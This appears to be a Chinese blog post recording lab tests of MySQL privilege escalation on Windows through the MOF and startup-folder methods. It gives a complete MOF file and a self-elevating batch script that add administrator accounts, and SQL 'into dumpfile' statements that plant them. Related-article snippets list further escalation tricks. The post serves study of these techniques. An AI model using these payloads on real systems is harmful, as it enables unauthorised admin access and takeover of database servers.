MySQL数据库提权学习

最新推荐文章于 2024-06-05 11:40:11 发布
原创 最新推荐文章于 2024-06-05 11:40:11 发布 · 345 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #提权

MySQL数据库提权学习

——

之前测试过MySQL的udf提权方式,现在对MySQL的其它两种方式进行测试与学习。

MySQL数据库UDF提权:
https://blog.youkuaiyun.com/Goodric/article/details/125916936?spm=1001.2014.3001.5501

——
——

mof提权

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。
在mysql的root权限下,使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

影响: windows server2008以下的版本

——
先创建一个 .mof文件,通过webshell或上传漏洞上传到目标机器的可读写的目录。

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};


instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin123!@# /add\")";
};


instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

这里通过webshell上传到网站根目录。
请添加图片描述

然后通过数据库语句导入到mof文件夹中。

select load_file(‘C:/phpstudy_pro/WWW/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

请添加图片描述

可以看到成功导入到了mof文件夹中
请添加图片描述

过一会里面的语句就会被执行,然后文件应该会自动放在上图中good文件夹中。

——
——

启动项提权

原理:
向 启动项目录导入自定义bat或vbs文件,
重启服务器则会自动调用导入到启动项目录下的下的VBS或bat脚本,并执行其中的用户添加及提权命令。

条件
启动项目录可读写,直接将提权脚本上传到该目录下
root账号登陆MySQL

测试:

创建 .bat 文件,文件内容:

@echo off
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
net user test test123! /add

其中这些内容的作用是以管理员权限执行这个bat文件。(不然cmd命令行可能会回显拒绝访问)

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"

这个就是我们想要执行的cmd命令创建用户了。(当前可能只有网站的权限,通过这里可以执行管理员可执行的命令)

net user test test123! /add

请添加图片描述

通过webshell等方式先把文件放入目标机的可读写目录。
然后通过sql语句导入到启动项目录。

select load_file('C:\\phpstudy_pro\\WWW\\add.bat') into dumpfile 'C:\\Users\\goodric\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\add.bat';

请添加图片描述
——
可以看到成功导入到启动项目录。
请添加图片描述

如果启动项的目录不好找,可以在开始-所有程序-启动-打开查看这个文件夹。
请添加图片描述

然后重启就会自动执行这个.bat文件。不够也会存在一个问题,如果以管理员执行这个文件的话,可能会弹这个窗口(目标机器可以设置不弹出),不知道有没有其它方法可以以管理员方式执行且不执行的。
请添加图片描述

Mysql姿势总结
Bird&Bird
08-02 689
目录一、写入Webshellinto outfile 写shell日志文件写shellUDFMOF 一、写入Webshell into outfile 写shell 前条件: 1、知道网站物理路径 2、高数据库用户 3、load_file() 开启 即 secure_file_priv 无限制 4、网站路径有写入限 首先基础语法查询是否 secure_file_priv 没有限制 show global variables like '%secure_file_priv%'; va
mysql常见姿势总结
Sud0day的博客
03-06 571
mysql常见姿势总结 最近在复习mysql,所以正好写篇文章总结一下关于mysql的常见姿势 相关操作 select @@version; 查询数据库版本 select @@basedir; 查询MYSQL安装路径 select @@plugin_dir ; 查看plugin路径 select host, user, password from mysql.user; 查询hash...
Mysql
IT技术宅-北方的刀郎
03-21 2473
Mysql来源:本站转载 作者:佚名 时间:2012-07-19 TAG: 我要投稿Author:小乖&Mix0xrnFrom:http://www.dis9.com & http://team.f4ck.net & http://www.h4x0er.comEmail:hx0c4k@gmail.comData:2012-06-23Weibo:http://t.qq.com/HanWellZh
升-MY&MS&ORA等SQL数据库
weixin_44805159的博客
10-12 413
在利用系统溢出漏洞无果的情况下,可以采用数据库进行,但需要知道数据库的前条件:服务器开启数据库服务及获取到最高限用户密码。除Access数据库外,其他数据库基本都存在数据库的可能。 #数据库应用升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库限用户密码收集等方法#目前数据库对应的技术及方法等 Mysql的密码:select * from mysql.user;#案例1.MYSQL数据库演示-脚本&MSF**流程:服务探针-信息收集-利用-获取
mysql_【原创】MySQL常见姿势总结
weixin_39686192的博客
12-05 1168
最近在复习mysql,所以正好写篇文章总结一下关于mysql的常见姿势相关操作select @@version; 查询数据库版本 select @@basedir; 查询MYSQL安装路径 select @@plugin_dir ; 查看plugin路径 select host, user, password from mysql.user; 查询hash (MySQL <= 5.6...
mysql总结
weixin_45605374的博客
12-12 935
udf UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
四、MySQL 方式
xlsj雪松的博客
11-18 1979
Mysql方式总结
web安全:mysql总结篇
kali_Ma的博客
10-24 4810
前言 前两天参加了省赛的内网渗透,在拿到webshell后发现是一个站库分离,通过信息搜集得到了数据库的账号密码,但是是一个www-data限,执行不了代理的命令,这时候就需要到root限才能够执行命令,最后还没有通过udf,而是通过/tmp这个目录能够修改限,改为777限后使用的代理。因为linux打得比较少,我们队在这个地方卡了很久,导致只打到了第一层网络,第二层内网就没有时间去打,所以补一下关于mysql知识。 UDF 何为UDF UDF是mysql的一个拓展接口,UDF(U
暗月mysql全版本通杀神器-V2014
01-13
暗月mysql全版本通杀神器-V2014,亲测真实有效,可用。如有侵,请联系优快云管理员删除即可
玄机靶场 第二章日志分析-mysql应急响应
最新发布
qq_46343633的博客
06-05 1749
1.黑客第一次写入的shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的限 flag{whoami后的值}
数据库MySQL UDF (Window环境)
李同學的安全圈
03-16 2690
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF等方式进行获取限,文章中内容仅用于技术交流,切勿用于非授下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
MySQL
热门推荐
Grey的博客
05-12 3万+
一、Mysql必备条件1.服务器安装Mysql数据库利用Mysql的前就是服务器安装了mysql数据库,且mysql的服务没有降Mysql数据库默认安装是以系统限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行限对于Mysql数据库服务运行限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
MySQL总结(建议收藏)
xj28555的博客
09-08 887
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库限 在平常的渗透中,我们通常可以在一些特殊情况下得到数据库的用户名密码(最高限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 限 口令爆破、sqlmap的--sql-shell模式数据库配置文件中拿明文密码已经
MYSQL数据库的几种方法——教程
W小哥
01-13 1万+
一、简介 在利用系统溢出漏洞无果的情况下,可以采用数据库进行数据库的前条件: 1、服务器开启数据库服务 2、获取到最高限用户密码 (除Access数据库外,其他数据库基本都存在数据库的可能) 常见密码获取方式: 1、读取网站数据库配置文件(了解其命名规则及查找技巧) 例如:sql data inc config conn database common include等 2、读取数据库存储或备份文件(了解其数据库存储格式及对应内容) 例如:@@basedir/data/数据库名/表名.m
Mysql本地漏洞/写my.cnf文件命令执行漏洞
Exploit的小站~
05-10 1万+
0x00 漏洞影响 MySQL <= 5.7.15远程代码执行/ (0day) 5.6.33 5.5.52 Mysql分支的版本也受影响,包括: MariaDB PerconaDB 0x01 条件 (1)可以在低(需要有FILE限)账户下执行 (2)可以执行sql,最好是个webshell或者phpmyadmin里 (3Mysql 5.5版本以上 ...
MySQL总结一 UDF
xiaopan233的博客
03-25 2137
UDF kali 中文件位置 /usr/share/metasploit-framework/data/exploits/mysql 首先先要破解得到靶机的数据库密码。使用kali连接后。查看一些必要的属性 查看插件路径 show variables like "%plugin%"; 看到了插件目录了。我们来看看我们能通过什么方式将UDF插件放到这个目录...
利用mysql的几种方式
一个安全研究员
08-06 2万+
如题
升之——数据库
温柔小薛的博客
05-06 2942
数据库升 这是这两天学习的哈,一篇篇发太麻烦了,就整理在一篇文章里了,整体感觉基本都是靠工具,不靠工具的还是都比较有难度的,五一假期过去了也该继续回到紧张的学习中了,冲鸭! 在家没衣服穿太可怜了,想回学校取衣服T_T 如何获取mysql账号密码 1.查看网站配置文件。 如:conn、config、data、sql、common 、inc等。 2.查看数据库安装路径下的mysql文件 安装目...
mysql load file_MySQL使用LOAD_FILE()函数方法总结
weixin_35141284的博客
01-27 6567
mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。语法load_file(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:select load_file('/data/test.txt') as result;结果:+------------------------------------------+| result...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值